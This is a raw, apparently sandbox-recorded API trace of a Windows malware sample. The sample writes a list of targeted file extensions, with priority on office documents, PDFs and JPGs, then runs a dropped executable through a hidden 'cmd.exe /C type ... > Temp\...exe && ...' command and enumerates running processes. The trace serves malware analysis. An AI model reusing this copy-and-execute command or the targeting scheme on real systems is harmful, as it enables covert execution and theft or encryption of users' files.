[0111.592] CharUpperBuffW (in: lpsz="url", cchLength=0x3 | out: lpsz="URL") returned 0x3 [0111.592] CharUpperBuffW (in: lpsz="LOG1", cchLength=0x4 | out: lpsz="LOG1") returned 0x4 [0111.592] CharUpperBuffW (in: lpsz="LOG1", cchLength=0x4 | out: lpsz="LOG1") returned 0x4 [0111.592] CharUpperBuffW (in: lpsz="LOG2", cchLength=0x4 | out: lpsz="LOG2") returned 0x4 [0111.592] CharUpperBuffW (in: lpsz="LOG2", cchLength=0x4 | out: lpsz="LOG2") returned 0x4 [0111.592] CharUpperBuffW (in: lpsz="search-ms", cchLength=0x9 | out: lpsz="SEARCH-MS") returned 0x9 [0111.592] CharUpperBuffW (in: lpsz="search-ms", cchLength=0x9 | out: lpsz="SEARCH-MS") returned 0x9 [0111.592] CharUpperBuffW (in: lpsz="search-ms", cchLength=0x9 | out: lpsz="SEARCH-MS") returned 0x9 [0111.592] CharUpperBuffW (in: lpsz="contact", cchLength=0x7 | out: lpsz="CONTACT") returned 0x7 [0111.592] CharUpperBuffW (in: lpsz="contact", cchLength=0x7 | out: lpsz="CONTACT") returned 0x7 [0111.593] CharUpperBuffW (in: lpsz="contact", cchLength=0x7 | out: lpsz="CONTACT") returned 0x7 [0111.593] CharUpperBuffW (in: lpsz="contact", cchLength=0x7 | out: lpsz="CONTACT") returned 0x7 [0111.593] CharUpperBuffW (in: lpsz="contact", cchLength=0x7 | out: lpsz="CONTACT") returned 0x7 [0111.593] CharUpperBuffW (in: lpsz="contact", cchLength=0x7 | out: lpsz="CONTACT") returned 0x7 [0111.593] CharUpperBuffW (in: lpsz="contact", cchLength=0x7 | out: lpsz="CONTACT") returned 0x7 [0111.593] CharUpperBuffW (in: lpsz="png", cchLength=0x3 | out: lpsz="PNG") returned 0x3 [0111.593] CharUpperBuffW (in: lpsz="png", cchLength=0x3 | out: lpsz="PNG") returned 0x3 [0111.593] CharUpperBuffW (in: lpsz="wav", cchLength=0x3 | out: lpsz="WAV") returned 0x3 [0111.593] CharUpperBuffW (in: lpsz="wav", cchLength=0x3 | out: lpsz="WAV") returned 0x3 [0111.593] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.593] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.593] CharUpperBuffW (in: lpsz="bmp", cchLength=0x3 | out: lpsz="BMP") returned 0x3 [0111.593] CharUpperBuffW (in: lpsz="png", cchLength=0x3 | out: lpsz="PNG") returned 0x3 [0111.593] CharUpperBuffW (in: lpsz="png", cchLength=0x3 | out: lpsz="PNG") returned 0x3 [0111.593] CharUpperBuffW (in: lpsz="wav", cchLength=0x3 | out: lpsz="WAV") returned 0x3 [0111.593] CharUpperBuffW (in: lpsz="wav", cchLength=0x3 | out: lpsz="WAV") returned 0x3 [0111.594] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\7l6owdi9fmrsoy1o.elst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0111.594] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="[ALL]\r\nTRX_DLL|54\r\nBMP|51\r\nHXN|29\r\nURL|25\r\nWAV|19\r\nPNG|16\r\nJPG|12\r\nFLV|11\r\nMKV|11\r\nAVI|8\r\nDOCX|8\r\nXLSX|8\r\nCONTACT|7\r\nPPTX|7\r\nSWF|7\r\nM4A|6\r\nDOC|5\r\nMP4|5\r\nODS|5\r\nOTS|5\r\nSEARCH-MS|4\r\nODT|3\r\nPDF|3\r\nPPT|3\r\nRSM|3\r\nXLS|3\r\nCSV|2\r\nGRL|2\r\nHXW|2\r\nODP|2\r\nPST|2\r\nSDF|2\r\nACRODATA|1\r\nHXD|1\r\nHXH|1\r\nHXL|1\r\nLCK|1\r\nLIBRARY-MS|1\r\nLOG1|1\r\nLOG2|1\r\nPPS|1\r\nVSS|1\r\n[ALL_END]\r\n\r\n[PRIORITY]\r\nSDF|2\r\nXLSX|8\r\nXLS|3\r\nDOCX|8\r\nDOC|5\r\nODS|5\r\nODT|3\r\nPDF|3\r\nJPG|12\r\n[PRIORITY_END]\r\n\r\n[PLACES]\r\nC:\\\r\n[PLACES_END]\r\n\r\n", cchWideChar=481, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 481 [0111.595] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="[ALL]\r\nTRX_DLL|54\r\nBMP|51\r\nHXN|29\r\nURL|25\r\nWAV|19\r\nPNG|16\r\nJPG|12\r\nFLV|11\r\nMKV|11\r\nAVI|8\r\nDOCX|8\r\nXLSX|8\r\nCONTACT|7\r\nPPTX|7\r\nSWF|7\r\nM4A|6\r\nDOC|5\r\nMP4|5\r\nODS|5\r\nOTS|5\r\nSEARCH-MS|4\r\nODT|3\r\nPDF|3\r\nPPT|3\r\nRSM|3\r\nXLS|3\r\nCSV|2\r\nGRL|2\r\nHXW|2\r\nODP|2\r\nPST|2\r\nSDF|2\r\nACRODATA|1\r\nHXD|1\r\nHXH|1\r\nHXL|1\r\nLCK|1\r\nLIBRARY-MS|1\r\nLOG1|1\r\nLOG2|1\r\nPPS|1\r\nVSS|1\r\n[ALL_END]\r\n\r\n[PRIORITY]\r\nSDF|2\r\nXLSX|8\r\nXLS|3\r\nDOCX|8\r\nDOC|5\r\nODS|5\r\nODT|3\r\nPDF|3\r\nJPG|12\r\n[PRIORITY_END]\r\n\r\n[PLACES]\r\nC:\\\r\n[PLACES_END]\r\n\r\n", cchWideChar=481, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 481 [0111.595] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="[ALL]\r\nTRX_DLL|54\r\nBMP|51\r\nHXN|29\r\nURL|25\r\nWAV|19\r\nPNG|16\r\nJPG|12\r\nFLV|11\r\nMKV|11\r\nAVI|8\r\nDOCX|8\r\nXLSX|8\r\nCONTACT|7\r\nPPTX|7\r\nSWF|7\r\nM4A|6\r\nDOC|5\r\nMP4|5\r\nODS|5\r\nOTS|5\r\nSEARCH-MS|4\r\nODT|3\r\nPDF|3\r\nPPT|3\r\nRSM|3\r\nXLS|3\r\nCSV|2\r\nGRL|2\r\nHXW|2\r\nODP|2\r\nPST|2\r\nSDF|2\r\nACRODATA|1\r\nHXD|1\r\nHXH|1\r\nHXL|1\r\nLCK|1\r\nLIBRARY-MS|1\r\nLOG1|1\r\nLOG2|1\r\nPPS|1\r\nVSS|1\r\n[ALL_END]\r\n\r\n[PRIORITY]\r\nSDF|2\r\nXLSX|8\r\nXLS|3\r\nDOCX|8\r\nDOC|5\r\nODS|5\r\nODT|3\r\nPDF|3\r\nJPG|12\r\n[PRIORITY_END]\r\n\r\n[PLACES]\r\nC:\\\r\n[PLACES_END]\r\n\r\n", cchWideChar=481, lpMultiByteStr=0x1278e88, cbMultiByte=481, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[ALL]\r\nTRX_DLL|54\r\nBMP|51\r\nHXN|29\r\nURL|25\r\nWAV|19\r\nPNG|16\r\nJPG|12\r\nFLV|11\r\nMKV|11\r\nAVI|8\r\nDOCX|8\r\nXLSX|8\r\nCONTACT|7\r\nPPTX|7\r\nSWF|7\r\nM4A|6\r\nDOC|5\r\nMP4|5\r\nODS|5\r\nOTS|5\r\nSEARCH-MS|4\r\nODT|3\r\nPDF|3\r\nPPT|3\r\nRSM|3\r\nXLS|3\r\nCSV|2\r\nGRL|2\r\nHXW|2\r\nODP|2\r\nPST|2\r\nSDF|2\r\nACRODATA|1\r\nHXD|1\r\nHXH|1\r\nHXL|1\r\nLCK|1\r\nLIBRARY-MS|1\r\nLOG1|1\r\nLOG2|1\r\nPPS|1\r\nVSS|1\r\n[ALL_END]\r\n\r\n[PRIORITY]\r\nSDF|2\r\nXLSX|8\r\nXLS|3\r\nDOCX|8\r\nDOC|5\r\nODS|5\r\nODT|3\r\nPDF|3\r\nJPG|12\r\n[PRIORITY_END]\r\n\r\n[PLACES]\r\nC:\\\r\n[PLACES_END]\r\n\r\n", lpUsedDefaultChar=0x0) returned 481 [0111.595] WriteFile (in: hFile=0xec, lpBuffer=0x1278e88*, nNumberOfBytesToWrite=0x1e1, lpNumberOfBytesWritten=0x12fbb0, lpOverlapped=0x0 | out: lpBuffer=0x1278e88*, lpNumberOfBytesWritten=0x12fbb0*=0x1e1, lpOverlapped=0x0) returned 1 [0111.655] CloseHandle (hObject=0xec) returned 1 [0111.655] GetTickCount () returned 0x26bbd [0111.655] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc10 | out: lpPerformanceCount=0x12fc10*=16844461428) returned 1 [0111.655] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="G") returned 1 [0111.655] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="Y") returned 1 [0111.655] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="m") returned 1 [0111.656] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="4") returned 1 [0111.656] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="N") returned 1 [0111.656] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="x") returned 1 [0111.656] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="C") returned 1 [0111.656] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="U") returned 1 [0111.656] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273b8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0111.656] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x38 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x38 [0111.656] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0111.656] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\", lpszShortPath=0x1273b8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0111.656] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x63 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x63 [0111.656] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0111.656] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" [PARAMS]", cchLength=0xb1 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\GYM4NXCU.EXE\" && \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\GYM4NXCU.EXE\" [PARAMS]") returned 0xb1 [0111.656] CharUpperBuffW (in: lpsz="[PARAMS]", cchLength=0x8 | out: lpsz="[PARAMS]") returned 0x8 [0111.657] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb1c*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb0c | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"", lpProcessInformation=0x12fb0c*(hProcess=0xf0, hThread=0xec, dwProcessId=0xd44, dwThreadId=0xd48)) returned 1 [0111.662] CloseHandle (hObject=0xf0) returned 1 [0111.662] CloseHandle (hObject=0xec) returned 1 [0111.662] Sleep (dwMilliseconds=0xfa) [0111.994] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xf8 [0111.999] Process32FirstW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.000] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0112.000] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0112.001] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.002] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0112.002] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.003] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0112.004] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0112.004] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0112.005] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0112.006] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.006] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.007] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.008] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.008] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.009] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0112.009] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.011] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.012] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0112.013] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.014] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0112.015] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0112.016] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0112.018] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0112.019] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.020] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0112.021] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0112.022] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0112.023] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0112.024] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0112.025] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0112.026] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0112.028] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0112.029] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0112.030] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0112.031] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0112.032] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0112.096] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0112.097] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: lppe=0x12f934*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0112.098] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f934 | out: 